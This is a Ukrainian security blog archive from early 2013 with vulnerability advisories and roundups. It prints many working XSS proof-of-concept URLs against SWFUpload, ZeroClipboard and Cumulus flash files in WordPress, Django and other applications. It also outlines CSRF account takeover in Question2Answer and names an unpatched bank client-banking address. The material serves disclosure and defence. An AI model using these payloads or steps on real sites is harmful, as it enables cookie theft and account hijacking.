Архів для категорії 'Уразливості'

Добірка уразливостей

17:20 13.03.2013

В даній добірці уразливості в веб додатках:

  • Stack Overflow in DartWebserver.dll <= 1.9 (деталі)
  • Multiple Cross-Site Scripting (XSS) in glFusion (деталі)
  • Nova vulnerability (деталі)
  • Remote Code Execution Vulnerability in MAKETEXT macro (деталі)
  • Nova vulnerabilities (деталі)
  • nagios metacharacter filtering omission (деталі)
  • DataWatch Monarch BI v5.1 admin section reflected cross-site scripting (деталі)
  • rubygem-ruby_parser: incorrect temporary file usage (деталі)
  • DataWatch Monarch Business Intelligence (BI) v5.1 admin section stored cross-site scripting (деталі)
  • Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities (деталі)

Уразливості в SWFUpload в численних веб додатках: WordPress, Dotclear, InstantCMS, AionWeb та інші

23:52 12.03.2013

Раніше я писав про Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Торік я писав про іншу XSS дірку в SWFUpload і зазначав, що існує багато інших веб додатків з вразливим SWFUpload. Всі вони вразливі до цих нових уразливостей, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Багато веб додатків включають декілька файлів SWFUpload. Не всі ці флешки вразливі до нивих дірок: swfupload_f8.swf і swfupload_f9.swf не вразливі (вони не мають функціоналу buttonText).

Тому з них вразливі наступні веб додатки (та багато інших веб додатків):

swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter, SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

А також вразливий InfoGlue (про XSS уразливість в ZeroClipboard.swf в якому я писав минулого місяця), що також містить SWFUpload.

В SWFUpload є Content Spoofing та Cross-Site Scripting уразливості, як я зазначив у вищезгаданому записі. Це приклади даної XSS уразливості в різних веб додатках.

Cross-Site Scripting (WASC-08):

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

http://site/js/libs/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Попередні XSS уразливості:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Нова XSS уразливість:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Вразливі всі веб додатки з SWFUpload (v2.2.0.1 та попередні версії). Вразливі WordPress 2.7 - 3.3.1, XenForo 1.0.0 - 1.1.2 та потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, що раніше називався Standard Edition, і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter та SentinelleOnAir.

Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

Уразливості в плагінах для WordPress №96

23:54 11.03.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах CommentLuv, Ripe HD FLV Player та RLSWordPressSearch. Для котрих з’явилися експлоіти. CommentLuv - це плагін для розширення коментарів, Ripe HD FLV Player - це флеш відео плеєр, RLSWordPressSearch - це плагін для пошуку нерухомості на сайті.

  • Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin (деталі)
  • WordPress Ripe HD FLV Player SQL Injection / Path Disclosure (деталі)
  • WordPress RLSWordPressSearch SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

CS та XSS уразливості в SWFUpload

16:08 11.03.2013

У листопаді, 10.11.2012, я виявив Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Про що вже повідомив розробникам.

Торік я писав про XSS уразливість в swfupload в WordPress та в багатьох інших веб додатках. І це нові дірки в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Всі вони вразливі, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Content Spoofing (WASC-12):

http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

Cross-Site Scripting (WASC-08):

http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Код виконається після кліку. Це strictly social XSS.

Вразливі всі версії SWFUpload - SWFUpload v2.2.0.1 та попередні версії. Та вразливі всі веб додатки, що використовують дані версії SWFUpload. Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

P.S.

Як я вияснив, дані CS та XSS уразливості були виправлені не в WordPress 3.3.2, а в WordPress 3.5.1. Тому версії 3.3.2 - 3.5 все ще вразливі, а в версії 3.5.1 вони включили оновлену версію SWFUpload, без згадки про це виправлення, лише згадали про це в версії 3.5.2.

AoF, IAA та CSRF уразливості в Question2Answer

23:57 01.03.2013

29.11.2012

У жовтні, 21.10.2012, я виявив Abuse of Functionality, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Question2Answer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

01.03.2013

Abuse of Functionality (WASC-42):

http://site/login
http://site/forgot
http://site/reset

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). При відсутності такого логіна/емайла, система відповідає “User not found”.

http://site/account

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). Якщо є такий логін, система відповідає “This username is used”. Якщо є такий емайл, система відповідає “This e-mail is used”.

Insufficient Anti-automation (WASC-21):

http://site/login
http://site/forgot
http://site/reset

На даних сторінках немає захисту від автоматизованих запитів. Що дозволяє автоматизувати Abuse of Functionality атаки.

http://site/account

Це внутрішня сторінка. Тому для автоматизації підбору логінів або емайлів спочатку потрібно зайти в акаунт. В зв’язку з відсутністю капчі в логін формі, про що я писав в попередньому записі, можливий автоматизований логін. Тому перший POST запит відправляється до http://site/login для входу, а наступні POST запити відправляються до http://site/account для підбору логінів/емайлів.

Cross-Site Request Forgery (WASC-09):

Можна захопити акаунт користувача (в тому числі адмінський акаунт) відправивши CSRF запит до http://site/account. Після відправлення запиту даним експлоітом для зміни емайла, нападнику потрібно відновити пароль на свій емайл через функцію відновлення (http://site/reset).

Експлоіт:

Question2Answer CSRF.html

Комплексний експлоіт:

Question2Answer Exploit.txt

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A). В Question2Answer є ще багато інших уразливостей, на що я звернув увагу розробника.

Добірка уразливостей

17:23 01.03.2013

В даній добірці уразливості в веб додатках:

  • Arbitrary File Upload Vulnerability in Sitecom Home Storage Center (деталі)
  • jQuery vulnerability (деталі)
  • Command Injection Vulnerability in Sitecom Home Storage Center (деталі)
  • rails security update (деталі)
  • Forescout NAC (Network Access Control) multiple vulnerabilities (деталі)
  • I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution (деталі)
  • Forescout NAC multiple vulnerabilities (деталі)
  • PHP-Fusion 7.02.05 SQL Injection (деталі)
  • Heap-based buffer underflow in libxml2, as used in Google Chrome (деталі)
  • SQLi found in Kodak Insite (деталі)

Уразливості в Question2Answer

23:53 28.02.2013

27.11.2012

У жовтні, 21.10.2012, я виявив Brute Force, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.02.2013

Brute Force (WASC-11):

В логін формі (http://site/login) немає захисту від BF атак.

Експлоіт:

Question2Answer BF.html

Insufficient Anti-automation (WASC-21):

На сторінці контактів (http://site/feedback) немає захисту від автоматизованих атак.

Експлоіт:

Question2Answer IAA.html

Cross-Site Request Forgery (WASC-09):

Немає захисту від CSRF атак в функціоналі логіна (http://site/login) і логаута (http://site/logout), та на інших сторінках (взагалі в системі відсутній такий захист). В наступному адвізорі я приведу приклад CSRF, що дозволяє захопити адмінський акаунт.

Відсутність капчі в формі логіна призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта), вищенаведений Brute Force та інші автоматизовані атаки.

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A).

Уразливості в плагінах для WordPress №95

23:55 27.02.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysija Newsletters, Google Document Embedder та Gallery. Для котрих з’явилися експлоіти. Wysija Newsletters - це плагін для відправки інформаційних листів, Google Document Embedder - це плагін для включення в сайт документів з сервісів Гугла, Gallery - це плагін для створення галерей зображень.

  • SQL Injection Vulnerability in Wysija Newsletters WordPress Plugin (деталі)
  • WordPress Google Document Embedder Arbitrary File Disclosure (деталі)
  • WordPress Gallery 3.8.3 Arbitrary File Read (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на jsbni.kiev.ua

17:10 27.02.2013

14.07.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://jsbni.kiev.ua - сайті банка “Національні інвестиції” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про peb.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка “Національні інвестиції”. Всього 109 уразливостей в системи IFOBS.

https://cbserver.jsbni.kiev.ua:7002/ifobsClient/

Дані уразливості досі не виправлені.

XSS в em-shorty, RepRapCalculator, Fulcrum, Django і aCMS

23:51 26.02.2013

Після мого попереднього списку вразливих програм з ZeroClipboard.swf, у лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них em-shorty, RepRapCalculator, Fulcrum, Django і aCMS. Та існує багато інших уразливих веб додатків з ZeroClipboard10.swf (деякі з них також містять ZeroClipboard.swf).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в першому записі).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Django (різні веб додатки на Django фреймворку):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/media/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Окрім ZeroClipboard, в aCMS також є Cumulus (tagcloud.swf), уразливості в якому я оприлюднив (і частина з них була виправлена) ще в 2009 році.

http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Вразливі наступні веб додатки з флешкою: em-shorty 0.5.0 та попередні версії, RepRapCalculator, Fulcrum - всі версії даної CMS, Django - є багато веб сайтів на Django framework (зокрема Django 1.3.1 та Djangoplicity) з ZeroClipboard, aCMS 1.0.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.